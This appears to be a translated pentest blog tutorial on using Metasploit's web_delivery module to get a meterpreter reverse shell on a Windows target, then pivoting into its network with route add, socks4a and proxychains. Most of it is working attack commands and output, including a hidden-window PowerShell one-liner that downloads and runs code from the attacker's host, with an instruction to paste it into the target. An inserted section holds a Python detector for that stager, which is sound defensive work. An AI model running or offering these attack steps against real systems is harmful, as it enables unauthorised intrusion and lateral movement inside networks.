0x01 install metasploit

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall &&
chmod 755 msfinstall &&
./msfinstall

0x02 make meterpreter

There are many ways to do this; bind_tcp and reverse_tcp both work. I won't go through the various options here, see http://c-chicken.cc/hacking/2015/10/29/Meterpreter-Guide.html. Here we use web_delivery.

msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > show options

Module options (exploit/multi/script/web_delivery):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)


Payload options (python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Python


msf exploit(web_delivery) > set target 2
target => 2

msf exploit(web_delivery) > set LHOST 192.169.0.101
LHOST => 192.169.0.101

msf exploit(web_delivery) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp

msf exploit(web_delivery) > exploit -j

Running it gives:

powershell.exe -nop -w hidden -c $B=new-object net.webclient;$B.proxy=[Net.WebRequest]::GetSystemWebProxy();$B.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $B.downloadstring('http://192.169.0.101:8080/5qMLoF86nTI');

Paste this into the Windows target and run it to get a meterpreter session.
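From the defender's side, the stager line above is exactly what lands in process-creation logs (Sysmon event 1, Windows 4688). The following is an added example, not code from the original post: it scores constructed command lines against the traits of that one-liner (no profile, hidden window, WebClient with the system proxy, IEX of a downloaded string) and extracts the download URL for blocking. The sample log lines, indicator weights and threshold are my own assumptions.

```python
import re

# Constructed sample process-creation command lines (not taken from real logs):
# the first is the web_delivery stager pattern, the other two are benign admin usage.
SAMPLE_CMDLINES = [
    "powershell.exe -nop -w hidden -c $B=new-object net.webclient;"
    "$B.proxy=[Net.WebRequest]::GetSystemWebProxy();"
    "$B.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;"
    "IEX $B.downloadstring('http://192.169.0.101:8080/5qMLoF86nTI');",
    "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
    "powershell.exe -NoProfile -Command Get-Service | Where-Object Status -eq Running",
]

# Each indicator is a case-insensitive regex plus a weight (weights are assumed).
# The stager trips every one of them; ordinary one-liners trip at most one.
INDICATORS = {
    "no_profile":    (re.compile(r"-nop\b|-noprofile\b", re.I), 1),
    "hidden_window": (re.compile(r"-w(indowstyle)?\s+hidden\b", re.I), 2),
    "webclient":     (re.compile(r"net\.webclient", re.I), 2),
    "system_proxy":  (re.compile(r"GetSystemWebProxy|DefaultCredentials", re.I), 1),
    "download_exec": (re.compile(r"\b(iex|invoke-expression)\b.*downloadstring", re.I), 3),
}
ALERT_THRESHOLD = 5  # assumed: needs more than one weak indicator to alert
URL_RE = re.compile(r"https?://[^\s'\"()]+", re.I)


def score_cmdline(cmdline):
    """Return (score, matched indicator names, embedded URLs) for one command line."""
    matched = [name for name, (rx, _) in INDICATORS.items() if rx.search(cmdline)]
    score = sum(INDICATORS[name][1] for name in matched)
    return score, matched, URL_RE.findall(cmdline)


def detect_stagers(cmdlines, threshold=ALERT_THRESHOLD):
    """Return a record for every command line whose score reaches the threshold."""
    hits = []
    for cmdline in cmdlines:
        score, matched, urls = score_cmdline(cmdline)
        if score >= threshold:
            hits.append({"cmdline": cmdline, "score": score,
                         "indicators": matched, "urls": urls})
    return hits


if __name__ == "__main__":
    for hit in detect_stagers(SAMPLE_CMDLINES):
        print(f"ALERT score={hit['score']} indicators={hit['indicators']} urls={hit['urls']}")
```

The extracted URL is the value to feed into proxy or DNS blocking; the same host:port also shows up as the reverse_tcp callback destination in egress logs.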

0x03 add route

Once you have meterpreter, run background and you can see this shell's session:

meterpreter > background
[*] Backgrounding session 1...

Next you can add routes; usually these are routes to the internal network. Here is an example.

The machine where I installed metasploit has a Hong Kong IP, and the target has a Chongqing IP. I want to check whether the proxy works by requesting ip.cn. After pinging ip.cn to get its IP, I run:

msf auxiliary(socks4a) > route
Usage: route [add/remove/get/flush/print] subnet netmask [comm/sid]

Route traffic destined to a given subnet through a supplied session.
The default comm is Local

msf auxiliary(socks4a) > route add 118.184.180.46 255.255.255.255 1
[*] Route added

Once the route is added, set up the socks4a proxy.

msf post(autoroute) > use auxiliary/server/socks4a
msf auxiliary(socks4a) > show options

Module options (auxiliary/server/socks4a):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The address to listen on
   SRVPORT  1080             yes       The port to listen on.

msf auxiliary(auxiliary/server/socks4a) > set SRVPORT 8888
SRVPORT => 8888
msf auxiliary(auxiliary/server/socks4a) > run
[*] Auxiliary module execution completed
[*] Starting the socks4a proxy server

Then change the proxychains config file to:

➜  ~ cat /usr/local/etc/proxychains.conf|grep socks4
#       socks4  192.168.1.49    1080
#       proxy types: http, socks4, socks5
socks4 *.*.*.*(IP of the machine holding the meterpreter session) 8888

Then run:

➜  ~ proxychains4 curl ip.cn
[proxychains] config file found: /usr/local/Cellar/proxychains-ng/4.11/etc/proxychains.conf
[proxychains] preloading /usr/local/Cellar/proxychains-ng/4.11/lib/libproxychains4.dylib
[proxychains] DLL init: proxychains-ng 4.11
[proxychains] Strict chain  ...  *.*.*.*:8888  ...  ip.cn:80  ...  OK
当前 IP:*.*.*.* 来自:重庆市 电信

As you can see, we successfully get the target's IP.

0x04 Afterword

In essence, this proxy just adds routes on the local machine so that traffic to certain subnets goes through the target. So when penetrating an internal network we can, for example, add the 192 subnet to the routing table and thereby reach the internal network.